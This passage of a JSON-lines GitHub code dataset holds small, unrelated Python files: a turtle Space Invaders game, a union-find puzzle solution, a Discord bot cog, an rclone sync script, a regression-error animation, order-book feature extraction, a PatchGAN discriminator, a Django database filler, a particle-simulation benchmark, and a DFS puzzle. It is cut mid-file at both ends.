collision\n\ndef iscollision(t1,t2):\n\tdistance = math.sqrt(math.pow(t1.xcor()-t2.xcor(),2)+math.pow(t1.ycor()-t2.ycor(),2))\n\tif distance<15:\n\t\treturn True\n\telse:\n\t\treturn False\n\n\n# Game over !\nfinish=turtle.Turtle()\nfinish.hideturtle()\nfinish.shape(\"triangle\")\nfinish.color(\"red\")\n\n# main game loop\nwhile True:\n\tfor enemy in enemies:\n\t\t\n\t\t# move enemy\n\t\tx = enemy.xcor()\n\t\tx += enemyspeed\n\t\tenemy.setx(x)\n\t\t# move enemy down and back\n\t\tif x > 280:\n\t\t\tfor enemy in enemies:\n\t\t\t\ty = enemy.ycor()\n\t\t\t\ty-=40\n\t\t\t\tenemy.sety(y)\n\t\t\tenemyspeed *= -1\n\n\t\telif x < -280:\n\t\t\tfor enemy in enemies:\n\t\t\t\ty = enemy.ycor()\n\t\t\t\ty -= 40\n\t\t\t\tenemy.sety(y)\n\t\t\tenemyspeed *= -1\n\t\tif enemy.ycor()< -300:\n\t\t\tenemy.sety(280)\n\t# check for collision\n\t\tif iscollision(bullet,enemy):\n\t\t\texplosion()\n\t\t\tbullet.hideturtle()\n\t\t\tbulletstate=\"ready\"\n\t\t\tbullet.setposition(0, -400)\n\t\t\tx = random.randint(-200, 200)\n\t\t\ty = random.randint(100, 250)\n\t\t\tenemy.setposition(x,y)\n\t\t\tscore+=10\n\t\t\tscorestring = \"Score: %s\" %score\n\t\t\tscore_pen.clear()\n\t\t\tscore_pen.write(scorestring, False, align=\"left\", font=(\"Arial\", 14, \"normal\"))\n\t\t\tscore_pen.hideturtle()\n\n\n\t\tif iscollision(enemy,player):\n\t\t\tplayer.hideturtle()\n\t\t\tenemy.hideturtle()\n\t\t\tfinish.write(\"Game Over !\",align=\"center\", font=(\"Arial\", 16, \"normal\"))\n\t\t\tbreak\n\n\t# move the bullet (fire)\n\tif bulletstate==\"fire\":\n\t\ty=bullet.ycor()\n\t\ty+=bulletspeed\n\t\tbullet.sety(y)\n\n\t# check if the bullet reached the top\n\tif bullet.ycor() > 275:\n\t\tbullet.hideturtle()\n\t\tbulletstate=\"ready\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nwn.mainloop()","repo_name":"MostafaSamyFayez/Space-Invader-Game-Python","sub_path":"Space_invader_game.py","file_name":"Space_invader_game.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
{"seq_id":"23105252328","text":"import sys\ninput = sys.stdin.readline\n\n\ndef find(node):\n # path compression technique\n if parent[node] != node:\n parent[node] = find(parent[node])\n return parent[node]\n\n\ndef union(node_1, node_2):\n root_1 = find(node_1)\n root_2 = find(node_2)\n\n parent[root_1] = root_2\n\n\n# G (number of gates), P (number of planes)\ng = int(input())\np = int(input())\nparent = [i for i in range(g+1)]\n\ncnt = 0\nfor plane in range(1, p+1):\n g_range = int(input())\n plane_parent = find(g_range)\n if plane_parent == 0:\n break\n union(plane_parent, plane_parent-1)\n cnt += 1\n\nprint(cnt)\n","repo_name":"dudupeng3105/algorithm","sub_path":"baekjoon/BJ_10775.py","file_name":"BJ_10775.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"41853269199","text":"import discord\nfrom discord.ext import commands\n\n\nclass Dev(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name=\"load\")\n @commands.is_owner()\n async def _load(self, ctx, *args):\n for arg in args:\n self.bot.load_extension(arg)\n await ctx.send(f\"{ctx.author.mention}: Loaded {list(args)} ! :3c\", delete_after=3)\n\n @commands.command(name=\"reload\")\n @commands.is_owner()\n async def _reload(self, ctx, *args):\n for arg in args:\n self.bot.reload_extension(arg)\n await ctx.send(f\"{ctx.author.mention}: Reloaded {list(args)} ! 
:3c\", delete_after=3)\n\n @commands.command(name=\"reload_all\")\n @commands.is_owner()\n async def _reload_all(self, ctx):\n exts = list(self.bot.extensions.keys())\n for ext in exts:\n self.bot.reload_extension(ext)\n await ctx.send(f\"{ctx.author.mention}: Reloaded all extensions!\", delete_after=3)\n\n\ndef setup(bot):\n bot.add_cog(Dev(bot))\n","repo_name":"Sheinxy/Snaky","sub_path":"cogs/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"38511224052","text":"import time\nimport os\ndata=os.getenv(\"RCLONE_DATA\")\napp_name=os.getenv(\"APP_NAME\")\n#Config File\nos.system(f'echo {data} | base64 -d > /home/coder/.config/rclone/rclone.conf')\nprint('config File Created')\n#Download\nos.system(f'rclone sync test:{app_name} ~/project/')\nprint('files Synced')\n#upload Every 1 min\nwhile True:\n os.system(f'rclone sync ~/project/ test:{app_name}')\n print('Files Uploaded')\n time.sleep(60)\n","repo_name":"charan200415/vscode","sub_path":"deploy-container/persiststorage.py","file_name":"persiststorage.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27295430282","text":"import numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom matplotlib import patches, lines\nfrom canvas.canvas2d import canvas2D\nfrom text.text import TextAnim\nimport matplotlib.patheffects as path_effects\n\n\nclass ErrorEquation(canvas2D):\n canvframes = 105\n def __init__(self, theme='dark'):\n super().__init__(size_xy=(8,80), frames=self.canvframes, atype='l',\n everyx=1, everyy=10, grid=False, theme=theme, xticklabels=np.arange(0,9), \n yticklabels=np.arange(10,90,10))\n # colors for dark bg\n if theme=='dark':\n self.data_color = '#20ad9d'\n self.funct_color = '#FBEB30'\n self.error_color = '#e50b0b'\n # colors for transparent versions\n elif theme=='light':\n self.data_color = '#3c8c48'\n self.funct_color = '#c43838'\n # configure event to listen to\n self.cid = self.fig.canvas.mpl_connect('key_press_event', self.key_press)\n # scattered values\n self.x = np.arange(1,7)\n self.y = np.array([18, 15, 35, 30, 54, 45])\n # wrong line\n self.X = np.arange(1, 8)\n self.Y = np.arange(10, 80, 10)\n # figures\n self.line = lines.Line2D([0], [0], color=self.funct_color)\n self.rect_1 = patches.Rectangle((0,0), 0, 0, alpha=0.2, color=self.error_color)\n self.rect_2 = patches.Rectangle((0,0), 0, 0, alpha=0.2, color=self.error_color)\n self.rect_3 = patches.Rectangle((0,0), 0, 0, alpha=0.2, color=self.error_color)\n self.rect_4 = patches.Rectangle((0,0), 0, 0, alpha=0.2, color=self.error_color)\n self.rect_5 = patches.Rectangle((0,0), 0, 0, alpha=0.2, color=self.error_color)\n self.rect_6 = patches.Rectangle((0,0), 0, 0, alpha=0.2, color=self.error_color)\n\n def show_text(self, text):\n text = self.ax.text(s=text, transform=plt.gcf().transFigure,\n x=.2, y=.85, color='w', ha='center', va='center',\n fontsize=40)\n # color edges of text\n text.set_path_effects([path_effects.Stroke(linewidth=5, foreground='black'),\n path_effects.Normal()])\n\n def last_eg(self):\n # scatter\n self.ax.scatter(self.x,self.y, s=50, alpha=1, color=self.data_color, marker='+')\n self.line.set_data(self.X, self.Y)\n self.ax.add_line(self.line)\n return self.line,\n\n def distances_anim(self, i):\n for txt in self.ax.texts:\n txt.set_visible(False)\n if 
i>10:\n i=10\n self.ax.text(s=r'$\\{$',\n x=self.X[0]-.45, y=self.Y[0]+1.5, color='white', visible=True,\n fontsize=50*i/(10), alpha=i/(10))\n self.ax.text(s=r'$\\{$',\n x=self.X[1]-.3, y=self.Y[1]-5, color='white', visible=True,\n fontsize=30*i/(10), alpha=i/(10))\n self.ax.text(s=r'$\\{$',\n x=self.X[2]-.3, y=self.Y[2]+1, color='white', visible=True,\n fontsize=30*i/(10), alpha=i/(10))\n self.ax.text(s=r'{',\n x=self.X[3]-.5, y=self.Y[3]-8, color='white', visible=True,\n fontsize=55*i/(10), alpha=i/(10))\n self.ax.text(s=r'{',\n x=self.X[4]-.2, y=self.Y[4]+1, color='white', visible=True,\n fontsize=25*i/(10), alpha=i/(10))\n self.ax.text(s=r'{',\n x=self.X[5]-.8, y=self.Y[5]-13, color='white', visible=True,\n fontsize=92*i/(10), alpha=i/(10))\n\n return self.ax,\n\n def animate_distances(self, f):\n anim = animation.FuncAnimation(self.fig, self.distances_anim, interval=40, \n frames=f, blit=False, repeat=False)\n \n # anim.save('e1.mp4',codec='png', fps=25,\n # dpi=200, bitrate=100, savefig_kwargs={'facecolor': self.bg_color})\n \n plt.show()\n\n def diffs_anim(self, i):\n for txt in self.ax.texts:\n txt.set_visible(False)\n if i==0:\n self.ax.add_patch(self.rect_1)\n self.ax.add_patch(self.rect_2)\n self.ax.add_patch(self.rect_3)\n self.ax.add_patch(self.rect_4)\n self.ax.add_patch(self.rect_5)\n self.ax.add_patch(self.rect_6)\n i = int(i/2)\n if i>10:\n i=10\n # draw difference ============\n diff = self.Y[:6]-self.y \n # square distance\n w = (diff[0]/10)*i\n self.rect_1.set_xy((self.x[0], self.y[0]))\n self.rect_1.set_height(diff[0])\n self.rect_1.set_width(w/10)\n\n w = (diff[1]/10)*i\n self.rect_2.set_xy((self.x[1], self.y[1]))\n self.rect_2.set_height(diff[1])\n self.rect_2.set_width(w/10)\n\n w = (diff[2]/10)*i\n self.rect_3.set_xy((self.x[2], self.y[2]))\n self.rect_3.set_height(diff[2])\n self.rect_3.set_width(w/10)\n\n w = (diff[3]/10)*i\n self.rect_4.set_xy((self.x[3], self.y[3]))\n self.rect_4.set_height(diff[3])\n self.rect_4.set_width(w/10)\n \n w = (diff[4]/10)*i\n self.rect_5.set_xy((self.x[4], self.y[4]))\n self.rect_5.set_height(diff[4])\n self.rect_5.set_width(w/10)\n\n w = (diff[5]/10)*i\n self.rect_6.set_xy((self.x[5], self.y[5]))\n self.rect_6.set_height(diff[5])\n self.rect_6.set_width(w/10)\n\n return self.rect_1,self.rect_2,self.rect_3,self.rect_4,self.rect_5,self.rect_6,self.ax\n\n def animate_diffs(self, f):\n anim = animation.FuncAnimation(self.fig, self.diffs_anim, interval=40, \n frames=f, blit=False, repeat=False)\n \n # anim.save('e2.mp4',codec='png', fps=25,\n # dpi=200, bitrate=100, savefig_kwargs={'facecolor': self.bg_color})\n \n plt.show()\n\n def error_anim(self, i):\n for txt in self.ax.texts:\n txt.set_visible(False)\n if i>=10:\n i=10\n error = self.Y[:6] - self.y\n error = round(sum(error**2),2)\n self.ax.text(s='Error = {}.00'.format(str(error)), fontproperties=self.prop,\n x=4, y=10, color=self.error_color,\n fontsize=50, alpha=i/10)\n\n return self.ax,\n\n def animate_error(self, f):\n anim = animation.FuncAnimation(self.fig, self.error_anim, interval=40, \n frames=None, blit=False, repeat=False)\n\n # anim.save('e3.mp4',codec='png', fps=25,\n # dpi=200, bitrate=100, savefig_kwargs={'facecolor': self.bg_color})\n\n plt.show()\n\n def key_press(self, event):\n if event.key == 'i':\n # Save Image with background\n plt.savefig('error_img.png', dpi=None, facecolor=self.bg_color)\n # reset\n elif event.key == '0':\n plt.cla()\n plt.xticks(ticks=[], labels='')\n plt.yticks(ticks=[], labels='')\n self.ax.spines['left'].set_color('none')\n 
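# hiding this spine (together with the left one above) removes the leftover axis frame before the next animation redraws on the cleared canvas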
self.ax.spines['bottom'].set_color('none')\n # show x-y axes with x with Ceres values\n elif event.key=='1':\n # self.animate_axes()\n self.static_canvas()\n elif event.key=='2':\n self.last_eg()\n # draw line with x\n elif event.key=='3':\n self.animate_distances(100)\n # move line with m\n elif event.key=='4':\n self.animate_diffs(100)\n # move line with b\n elif event.key=='5':\n self.animate_error(50)\n\n plt.show()\n\ndef main():\n # Hide toolbar from window\n mpl.rcParams['toolbar'] = 'None'\n # mpl.rc('text', usetext=True)\n # Initiate class\n ls = ErrorEquation(theme='dark')\n\n # Configure position of graph in canvas\n plt.subplots_adjust(left=.5, bottom=.2, right=.9, top=.8, wspace=.20, hspace=.20)\n # Full page\n # plt.subplots_adjust(left=0, bottom=0, right=1, top=1, wspace=.20, hspace=.20)\n\n # showtime\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jabud/math_animations","sub_path":"linear_regression/error_equation.py","file_name":"error_equation.py","file_ext":"py","file_size_in_byte":8093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71698891242","text":"import pandas as pd\nimport json\nfrom tqdm import tqdm\nimport numpy as np\nimport gc \n\n# @Author : Isaac YANG ZICHUN \n# @Stu_ID: 2009705\n# @Email : cm20952@bristol.ac.uk\n# @File : dataProcessing.py\n# @Interpreter: Python 3.7 on Google Colab\n# @Desc: this python file is used for data cleaning, data processing\n\n\ndef price_values(dataList):\n \"\"\"\n 1.To get all prices of LOB.txt in one day\n e.g. ask: [234,1], [232,2], [231,3]... ---Processing---> [234,232,231...]\n \n 2.To get the Maximum, Minimum, Mean, Variance and Standard Deviation of it.\n return: [Maximum, Minimum, Mean, Variance, Standard Deviation]\n \"\"\"\n dataList = np.array(dataList)\n if len(dataList)>0:\n maxValue = dataList[0][0]\n minValue = dataList[-1][0]\n meanValue = np.mean(dataList[:,0])\n medianValue = np.median(dataList[:,0])\n stdValue = np.std(dataList[:,0])\n return [maxValue, minValue,meanValue,medianValue,stdValue]\n else:\n return None,None,None,None,None\n\ndef amount_values(dataList):\n \"\"\"\n 1. To get all amount of LOB.txt in one day\n e.g. ask:[[234,1],[232,2],[231,3]] ---Processing---> [1, 2, 3...]\n \n 2.To get the Maximum, Minimum, Mean, Median and Standard Deviation of it.\n return: [Maximum, Minimum, Mean, Median, Standard Deviation]\n \"\"\"\n dataList = np.array(dataList)\n if len(dataList)>0:\n maxValue = np.max(dataList[:,1])\n minValue = np.min(dataList[:,1])\n meanValue = np.mean(dataList[:,1])\n medianValue = np.median(dataList[:,1])\n stdValue = np.std(dataList[:,1])\n return [maxValue, minValue,meanValue,medianValue,stdValue]\n else:\n return None,None,None,None,None\n\ndef combine_price_amount_values(dataList):\n \"\"\"\n 1. To get combination of prices and amounts of LOB.txt in one day\n e.g. 
ask:[[234,1],[232,2],[231,3]] ---Processing---> [234,232,232,231,231,231]\n \n 2.To get the Maximum, Minimum, Mean, Median and Standard Deviation of it.\n return: [Maximum, Minimum, Mean, Median, Standard Deviation]\n \"\"\"\n if len(dataList)>1:\n tmp = []\n for i in dataList:\n tmp+=[i[0]]*i[1]\n dataList = np.array(tmp)\n if len(dataList)>1:\n maxValue = dataList[0]\n minValue = dataList[-1]\n meanValue = np.mean(dataList)\n medianValue = np.median(dataList)\n stdValue = np.std(dataList)\n return maxValue, minValue,meanValue,medianValue,stdValue\n else:\n return None,None,None,None,None\n\ndef mark_diff(x):\n \"\"\"\n Gets the label value.\n For example, \n ... ... ...\n 09:31:01 $250 0\n 09:31:02 $251 1 #Comparing to 9:31:01, $251>$250, so label is 1\n 09:31:03 $230 0 #Comparing to 9:31:02, $230<$250, so label is 0\n 1 represents rising and 0 represents falling\n return: 1/0\n \"\"\"\n if x>0:\n return 1\n elif x<=0:\n return 0\n else:\n return 0\n\ndef get_data(fileName,interval):\n \"\"\"\n To extract original data to be targeted\n First 10 columns are features with the 11th column is label, the 12th column is date.\n Params: \n fileName: LOB path and Tapes path\n interval: Given a time interval to pick up data from huge data, this can be modified based on computing capacity\n I give it to be 5 as default, normally every running time is 4 hours to complete on Google Colab free account.\n The larger interval is, the running time will be more.\n return: a dataframe -> 126\t5\t79.4\t 105\t 44.38400613\t 146\t 677\t 277.0384615\t 155\t 194.0621393\t0\t TstB02_2022-03-16\n 144\t24\t109.8863636\t128\t 35.59763521\t 145\t 656\t 258.25\t 167\t 184.0076048\t1\t TstB02_2022-03-16\n 142\t11\t117.0185185\t133.5\t33.38800558\t 147\t 788\t 372.6415094\t 192\t 237.6046418\t1\t TstB02_2022-03-16\n ...\n ...\n ...\n \"\"\"\n tapesPath = './DataSet_B02/%stapes.csv'%(fileName)\n LOBPath = './DataSet_B02/%sLOBs.txt'%(fileName)\n tapes = pd.read_csv(tapesPath,header=None)\n tapes.rename(columns={0:'date',1:'stock',2:'time',3:'price'},inplace=True)\n with open(LOBPath) as f:\n lob = f.readlines()\n times = []\n bid = []\n ask = []\n # get bid and ask price e.g. [\"time\", 1.258, [\"bid\", [[220, 4]]], [\"ask\", [[328, 3], [800, 1]]]]\n for i in lob:\n lobdata = json.loads(i)\n times.append(lobdata[1]) # [1.258,]\n bid.append(lobdata[2][1]) # [[220,4],...]\n ask.append(lobdata[3][1]) # [[328,3],[800,1]]\n totalData = pd.DataFrame({'times':times,'bid':bid,'ask':ask}) \n \n \"\"\"\n e.g. totalData is :\n \n times bid ask\n 0 881.195 [[267, 2], [259, 3], [258, 2], [257, 2], [256,... [[269, 1], [273, 4], [275, 3], [276, 1], [278,... \n 1 881.212 [[267, 2], [259, 3], [258, 2], [257, 2], [256,... [[269, 1], [273, 4], [275, 3], [276, 1], [278,... \n 2 881.229 [[267, 2], [259, 3], [258, 2], [257, 2], [256,... [[269, 1], [273, 4], [275, 3], [276, 1], [278,... \n 3 881.246 [[267, 2], [259, 3], [258, 2], [257, 2], [256,... [[269, 1], [273, 4], [275, 3], [276, 1], [278,... \n 4 881.263 [[267, 2], [259, 3], [258, 2], [257, 2], [256,... [[269, 1], [273, 4], [275, 3], [276, 1], [278,... 
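\n (each bid/ask cell above holds [price, size] pairs, as appended from lobdata[2][1] and lobdata[3][1])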
\n \n \"\"\"\n del times,bid,ask,lob\n gc.collect() #clean memory\n \n \n # Filter data according to interval given, because data is too huge, every running process will cost much time\n def get_most_close_value(x):\n index = (np.abs(totalData['times']-x)).argmin()\n return totalData['times'][index]\n v = pd.DataFrame({'tmpTimes':np.arange(1,totalData['times'].max(),interval)})\n v['times'] = v['tmpTimes'].apply(get_most_close_value)\n \"\"\" \n If interval is 5(default given): [tmpTimes] is a reference No. to cut the data\n V['tmpTimes']:\n tmpTimes \n 0 1.0 \n 1 6.0 \n 2 11.0 \n 3 16.0 \n 4 21.0 \n 5 26.0 \n 6 31.0 \n \"\"\"\n mergedData = pd.merge(v,totalData,how='left',on=['times'])\n del totalData\n gc.collect()\n print('7')\n \n def getTapPrice(times):\n try:\n price = tapes[tapes['time']<=times]['price'].values[-1]\n except:\n price =None\n return price\n \n mergedData['price'] = mergedData['times'].apply(getTapPrice)\n del tapes\n gc.collect()\n print('9')\n \n # Combine processed data \n mergedData['x_bid'] = mergedData['bid'].apply(lambda x :combine_price_amount_values(x))\n mergedData['x_ask'] = mergedData['ask'].apply(lambda x :combine_price_amount_values(x))\n mergedData['x'] = mergedData['x_bid'] + mergedData['x_ask']\n\n a = [i for i in mergedData['price'][1:].values - mergedData['price'][:-1].values]\n a.append(np.NAN)\n mergedData['diff'] = a\n mergedData['diff'] = mergedData['diff'].apply(lambda x :mark_diff(x))\n mergedData['date'] = [fileName]*len(mergedData)\n return mergedData\n \nimport os\nfiles = list(set([i[0:17] for i in os.listdir('./DataSet_B02') if i[0:17] !='.ipynb_checkpoint']))\n\n# System Entrance\nfor file in tqdm(files):\n if file != 'TstB02_2022-01-14':\n data = get_data(file,5)\n targetData = pd.DataFrame(np.array([i for i in data['x'].values]))\n targetData['y'] = data['diff']\n targetData['date'] = data['date']\n targetData.to_csv('data.csv',mode='a',index=None,header=None)\n\n\"\"\"\nexample of processed data:\nColumn 1-10 are features\nColumn 11 is Label\nColumn 1-5 are Maximum Minimum Mean Median Std of Bid in each time point\nColumn 6-10 are Maximum Minimum Mean Median Std of Ask in each time point\n\n126\t5\t79.4\t 105\t 44.38400613\t 146\t 677\t 277.0384615\t155\t194.0621393\t 0\tTstB02_2022-03-16\n144\t24\t109.8863636\t128\t 35.59763521\t 145\t 656\t 258.25\t167\t184.0076048\t 1\tTstB02_2022-03-16\n142\t11\t117.0185185\t133.5\t33.38800558\t 147\t 788\t 372.6415094\t192\t237.6046418\t 1\tTstB02_2022-03-16\n149\t61\t133.9787234\t141\t 22.96203097\t 163\t 785\t 367.8723404\t242\t222.722766\t 1\tTstB02_2022-03-16\n152\t36\t131.8113208\t145\t 29.56352712\t 156\t 770\t 353.5555556\t315\t207.7376075\t 0\tTstB02_2022-03-16\n\"\"\"","repo_name":"chloe-wenqi/MiniProject","sub_path":"Isaac YangZichun/Stage1_DataProcess.py","file_name":"Stage1_DataProcess.py","file_ext":"py","file_size_in_byte":8564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41356240681","text":"\"\"\"\n输入s[n],输出a[n],a[j] = avg(s[1..n])\n\"\"\"\n\nimport sys \nsys.path.append(r'E:\\WeiYun\\CodeVersion\\CodeSample\\Practice-Python\\JupyterNoteBook\\Temp & Test')\nimport decorators\n\n@decorators.timer\ndef prefix_average_1(s):\n a = [0] * len(s)\n for i in range(len(s)):\n total = 0\n for j in range(i + 1):\n total += s[j]\n a[i] = total/(i + 1)\n return a\n\n@decorators.timer\ndef prefix_average_2(s):\n a = [0] * len(s)\n total = 0\n for i in range(len(s)):\n total += s[i]\n a[i] = total/(i + 1)\n return a\n\n\nif 
__name__ == \"__main__\":\n nums = [i for i in range(1000)]\n # print(prefix_average_1(nums))\n # print(prefix_average_2(nums))\n \n prefix_average_1(nums)\n prefix_average_2(nums)","repo_name":"Vincent-233/Algorithms-Practice-Python","sub_path":"Chapter02-面向对象编程/Code/prefix_avg.py","file_name":"prefix_avg.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"19463777904","text":"from tensorflow.keras.optimizers import Adam\r\nfrom tensorflow.keras.initializers import RandomNormal\r\nfrom keras.models import Model,Input\r\nfrom tensorflow.keras.layers import Conv2D,LeakyReLU,Activation,Concatenate,BatchNormalization\r\nfrom keras.utils.vis_utils import plot_model\r\n\r\nimport os\r\nos.environ[\"PATH\"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin/'\r\n\r\ndef build_discriminator(image_shape):\r\n\tweight_init=RandomNormal(stddev=0.02)\r\n\r\n\tinput_source_image=Input(shape=image_shape)\r\n\r\n\tinput_target_image=Input(shape=image_shape)\r\n\r\n\t#concatenate\r\n\tmerge=Concatenate()([input_source_image,input_target_image])\r\n\t#C64 #Layer 1 doesnt have BN layer\r\n\tdisc=Conv2D(64,(4,4),strides=(2,2),padding='same',kernel_initializer=weight_init)(merge)\r\n\tdisc=LeakyReLU(alpha=0.2)(disc)\r\n\r\n\t#C128\r\n\tdisc=Conv2D(128,(4,4),strides=(2,2),padding='same',kernel_initializer=weight_init)(disc)\r\n\tdisc=BatchNormalization()(disc)\r\n\tdisc=LeakyReLU(alpha=0.2)(disc)\r\n\t#C256\r\n\tdisc=Conv2D(256,(4,4),strides=(2,2),padding='same',kernel_initializer=weight_init)(disc)\r\n\tdisc=BatchNormalization()(disc)\r\n\tdisc=LeakyReLU(alpha=0.2)(disc)\r\n\t#C512\r\n\tdisc=Conv2D(512,(4,4),strides=(2,2),padding='same',kernel_initializer=weight_init)(disc)\r\n\tdisc=BatchNormalization()(disc)\r\n\tdisc=LeakyReLU(alpha=0.2)(disc)\r\n\r\n\r\n\t#second last output layer\r\n\tdisc=Conv2D(512,(4,4),padding='same',kernel_initializer=weight_init)(disc)\r\n\tdisc=BatchNormalization()(disc)\r\n\tdisc=LeakyReLU(alpha=0.2)(disc)\r\n\r\n\t#outputlayer\r\n\tdisc=Conv2D(1,(4,4),padding='same',kernel_initializer=weight_init)(disc)\r\n\tpatch_output=Activation('sigmoid')(disc)\r\n\r\n\tmodel=Model([input_source_image,input_target_image],patch_output)\r\n\t#adam according to paper\r\n\toptimizer=Adam(lr=0.0002,beta_1=0.5,beta_2=0.999)\r\n\r\n\tmodel.compile(loss='binary_crossentropy',optimizer=optimizer,loss_weights=[0.5])\r\n\treturn model\r\n\r\nif __name__=='__main__':\r\n\timage_shape=(256,256,3)\r\n\r\n\tmodel=build_discriminator(image_shape)\r\n\r\n\tmodel.summary()\r\n\tplot_model(model,to_file='patch_gan_discriminator.png',show_shapes=True,show_layer_names=True)\r\n\r\n","repo_name":"rishabkr/Pix2Pix_GAN_Image_Translation","sub_path":"Pix2Pix_GAN_for_image_translation/patch_gan.py","file_name":"patch_gan.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"38998011740","text":"\"\"\"Clear and fill the database.\"\"\"\n\nimport string\nfrom django.db import transaction, IntegrityError\n\nfrom product.models import (\n Product,\n Categories,\n NutriscoreGrades,\n Brands,\n CodesProductsOff,\n)\n\n\ndef deletedata():\n \"\"\"Clear datas from Product tables and associates (not Users).\"\"\"\n Product.objects.all().delete()\n Categories.objects.all().delete()\n NutriscoreGrades.objects.all().delete()\n Brands.objects.all().delete()\n CodesProductsOff.objects.all().delete()\n\n\ndef 
insertdb(Api_data):\n \"\"\"Use Django ORM to fill database.\"\"\"\n # Fill Nutriscoregrades table\n grades = list(string.ascii_lowercase[0:4])\n i = 1\n for grade in grades:\n NutriscoreGrades.objects.get_or_create(pk=i, nutriscore_grade=grade)\n i += 1\n\n # Fill Product table and others\n count = 0\n product_count = 0\n for product in Api_data:\n try:\n with transaction.atomic():\n Brands_instance = Brands.objects.get_or_create(\n brand=product[\"brands\"],\n )\n Categories_instance = Categories.objects.get_or_create(\n category=product[\"categories\"],\n )\n CodesProductsOff_instance = CodesProductsOff.objects.get_or_create(\n code=product[\"code\"],\n )\n NutriscoreGrades_instance = NutriscoreGrades.objects.get_or_create(\n nutriscore_grade=product[\"nutriscore_grade\"],\n )\n Product_instance = Product.objects.get_or_create(\n product_name_fr=product[\"product_name_fr\"],\n generic_name_fr=product[\"generic_name_fr\"],\n fat_100g=product[\"fat_100g\"],\n saturated_fat_100g=product[\"saturated-fat_100g\"],\n salt_100g=product[\"salt_100g\"],\n sugars_100g=product[\"sugars_100g\"],\n url=product[\"url\"],\n image_url=product[\"image_url\"],\n Brands=Brands_instance[0],\n Categories=Categories_instance[0],\n CodesProductsOff=CodesProductsOff_instance[0],\n NutriscoreGrades=NutriscoreGrades_instance[0],\n )\n product_count += 1\n except IntegrityError as exception:\n count += 1\n print(\"IntegrityError count :\", count, exception.args[0])\n pass\n\n","repo_name":"acandido-tech/Projet11-ROL-1","sub_path":"product/offapi/insertdb.py","file_name":"insertdb.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10927146121","text":"import numpy\nimport time\nimport sys\nimport gc\nfrom ecell4 import *\n\ndef run_single(T, V, N, R, D):\n L = numpy.power(V, 1.0/3.0) # cuboid side length\n with species_attributes():\n A | {'D': D, 'radius': R}\n m = get_model() \n M = max(int(min(cbrt(N + N), L / (2*R))), 3)\n w = egfrd.EGFRDWorld(Real3(L, L, L), Integer3(M, M, M))\n w.bind_to(m)\n w.add_molecules(Species('A'), N)\n sim = egfrd.EGFRDSimulator(w)\n stirTime = T*0.00001\n t = 0.0\n gc.disable()\n sim.run(stirTime)\n print(\"Now running\",int(N),\"molecules for\",T,\"s\")\n endTime = stirTime+T\n start = time.time()\n sim.run(T)\n end = time.time()\n gc.collect()\n gc.enable()\n duration = end-start\n print(\"time taken:\",duration,\"s\")\n return duration\n\nif __name__ == '__main__':\n T = 1e-2\n V = 3e-15\n N = 1e+4\n R = 2.5e-9\n D = 1e-12\n #python run_single.py 1e-5 1e-15 1e+3 2.5e-9 1e-12\n if(len(sys.argv) == 6):\n T = float(sys.argv[1])\n V = float(sys.argv[2])\n N = float(sys.argv[3])\n R = float(sys.argv[4])\n D = float(sys.argv[5])\n run_single(T, V, N, R, D)\n\n","repo_name":"ecell/spatiocyte","sub_path":"examples/benchmark/egfrd/run_single.py","file_name":"run_single.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"72190969962","text":"n, m = map(int, input().split(' '))\n\nmapp = []\nfor i in range(n):\n mapp.append(list(map(int, input().split(' '))))\n\nhouse_list = []\nchicken_house_list = []\n\nfor i in range(n):\n for j in range(n):\n if mapp[i][j] == 1:\n house_list.append((i,j))\n elif mapp[i][j] == 2:\n chicken_house_list.append((i, j))\n mapp[i][j] = 0\n\nanswer = 99999\ncheck = [0 for _ in range(len(chicken_house_list))]\ntemp = []\nmin_dist = 99999\n\ndef dfs(idx, 
cnt):\n global min_dist\n if cnt == m:\n total_dist = 0\n for x, y in house_list:\n chick_dist = 9999\n for a, b in temp:\n chick_dist = min(chick_dist, abs(a-x) + abs(b-y))\n total_dist += chick_dist\n min_dist = min(total_dist, min_dist)\n return\n\n for i in range(idx, len(chicken_house_list)):\n if check[i] == 1:\n continue\n check[i] = 1\n temp.append(chicken_house_list[i])\n dfs(i, cnt+1)\n temp.pop()\n check[i]=0\n\ndfs(0, 0)\nprint(min_dist)\n","repo_name":"haeyong27/acmicpc","sub_path":"chicken.py","file_name":"chicken.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31598628661","text":"import numpy as np \nfrom copy import copy \n\"\"\"\nSequence Alignment with Profile HMM Problem: Align a new sequence to a family of sequences using a profile HMM.\n\nInput: A multiple alignment Alignment, a threshold θ, a pseudocount value σ, and a string Text.\nOutput: An optimal hidden path emitting Text in HMM(Alignment, θ, σ).\n\nCode Challenge: Solve the Sequence Alignment with Profile HMM Problem.\n\nInput: A string x followed by a threshold θ and a pseudocount σ, followed by an alphabet 